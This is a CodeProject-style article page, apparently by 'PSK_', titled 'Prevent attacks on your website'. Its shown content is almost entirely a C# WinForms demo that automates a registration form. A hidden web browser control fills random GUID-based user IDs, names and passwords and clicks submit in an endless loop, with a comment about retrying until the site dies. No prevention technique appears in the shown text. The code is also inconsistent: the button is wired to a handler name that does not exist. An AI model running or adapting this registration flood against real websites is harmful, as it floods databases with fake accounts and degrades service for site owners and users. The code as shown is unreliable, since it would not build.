Prevent attacks on your website

PSK_

Rate me:

3.21/5 (26 votes)

6 Jul 2005CPOL2 min read

80.8K

905

Using a simple example, I'll explain how to prevent a program that can register thousands of dummy users to your database and play with your database and application performance.

testdemo.zip
- TestDemo
  - Test
    - App.ico
    - AssemblyInfo.cs
    - bin
      - Debug
        
        AxInterop.SHDocVw.dll
        
        Interop.SHDocVw.dll
    - Form1.cs
    - Form1.resx
    - obj
      - Debug
        
        temp
        
        TempPE
    - Test.csproj
    - Test.csproj.user
    - Test.sln

using System;
using System.Drawing;
using System.ComponentModel;
using System.Windows.Forms;
using Microsoft.Win32;
using AxSHDocVw;
using SHDocVw;

namespace Test
{
	/// <summary>
	/// Summary description for Form1.
	/// </summary>
	public class Form1 : System.Windows.Forms.Form
	{
		private AxSHDocVw.AxWebBrowser WebBrowser1;
		private System.Windows.Forms.Button btnStart;
		/// <summary>
		/// Required designer variable.
		/// </summary>
		private System.ComponentModel.Container components = null;

		public Form1()
		{
			//
			// Required for Windows Form Designer support
			//
			InitializeComponent();

			//
			// TODO: Add any constructor code after InitializeComponent call
			//
		}

		/// <summary>
		/// Clean up any resources being used.
		/// </summary>
		protected override void Dispose( bool disposing )
		{
			if( disposing )
			{
				if (components != null) 
				{
					components.Dispose();
				}
			}
			base.Dispose( disposing );
		}

		#region Windows Form Designer generated code
		/// <summary>
		/// Required method for Designer support - do not modify
		/// the contents of this method with the code editor.
		/// </summary>
		private void InitializeComponent()
		{
			System.Resources.ResourceManager resources = new System.Resources.ResourceManager(typeof(Form1));
			this.WebBrowser1 = new AxSHDocVw.AxWebBrowser();
			this.btnStart = new System.Windows.Forms.Button();
			((System.ComponentModel.ISupportInitialize)(this.WebBrowser1)).BeginInit();
			this.SuspendLayout();
			// 
			// WebBrowser1
			// 
			this.WebBrowser1.Enabled = true;
			this.WebBrowser1.Location = new System.Drawing.Point(8, 8);
			this.WebBrowser1.OcxState = ((System.Windows.Forms.AxHost.State)(resources.GetObject("WebBrowser1.OcxState")));
			this.WebBrowser1.Size = new System.Drawing.Size(8, 8);
			this.WebBrowser1.TabIndex = 0;
			this.WebBrowser1.Visible = false;
			// 
			// btnStart
			// 
			this.btnStart.Location = new System.Drawing.Point(64, 40);
			this.btnStart.Name = "btnStart";
			this.btnStart.Size = new System.Drawing.Size(128, 23);
			this.btnStart.TabIndex = 1;
			this.btnStart.Text = "Start Registring";
			this.btnStart.Click += new System.EventHandler(this.button1_Click);
			// 
			// Form1
			// 
			this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
			this.ClientSize = new System.Drawing.Size(264, 93);
			this.Controls.Add(this.btnStart);
			this.Controls.Add(this.WebBrowser1);
			this.Name = "Form1";
			this.Text = "Form1";
			this.Load += new System.EventHandler(this.Form1_Load);
			((System.ComponentModel.ISupportInitialize)(this.WebBrowser1)).EndInit();
			this.ResumeLayout(false);

		}
		#endregion

		/// <summary>
		/// The main entry point for the application.
		/// </summary>
		[STAThread]
		static void Main() 
		{
			Application.Run(new Form1());
		}

		private void Form1_Load(object sender, System.EventArgs e)
		{
		
			//get the registratin page URL
			string url="http://localhost:8181/TestApplication1/Registration.aspx";
			Object o = null;
			//fetch the page to your web broswer.
			WebBrowser1.Navigate(url, ref o, ref o, ref o, ref o);
		
		}
			
			
			
	

		private void btnRegisterClick_Click(object sender, System.EventArgs e)
		{
			
			// use the HTMLDocument interface of mshtml to simulate the registration process
			mshtml.HTMLDocument obj;
			string tempGuid,userId,firstName,LastName,password=string.Empty;
			//execute an infinite loop
			while(true)
			{
				
				try
				{
					//get the rendom values for this user
					tempGuid=System.Guid.NewGuid().ToString();
					userId=tempGuid.Substring(0,9);
					firstName=tempGuid.Substring(3,12);
					LastName=tempGuid.Substring(11,10);
					password=tempGuid.Substring(10,8);

					// assing the values to the form fields.
					obj=(mshtml.HTMLDocument)WebBrowser1.Document;
					obj.getElementById("txtUserId").innerText=userId;
					obj.getElementById("txtFirstName").innerText=firstName;
					obj.getElementById("txtLastName").innerText=LastName;
					obj.getElementById("txtPassword").innerText=password;
					obj.getElementById("txtConfirmPassword").innerText=password;
				       
					// find the submit button to post the information to the website
					// execute the click of the submit button to post the informaion
					obj.getElementById("btnSubmit").click();
					// Note if you can't find the submit button by id then use the following approach
					// find it by index in the entire HTMLDocument
					/*
					 mshtml.HTMLInputElement objbut;
					 objbut=(mshtml.HTMLInputElement)obj.all.item("submit",0);
					 objbut.click();
					*/
				}
				catch
				{
					// faild :(
					// no problem we'll try again( try try until the site die ..)
				}
				
			}
			
		}
	}
}

By viewing downloads associated with this article you agree to the Terms of Service and the article's licence.

If a file you wish to view isn't highlighted, and is a text file (not binary), please let us know and we'll add colourisation support for it.

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

Written By

PSK_

Architect

India

Its me

Prevent attacks on your website

License

Comments and Discussions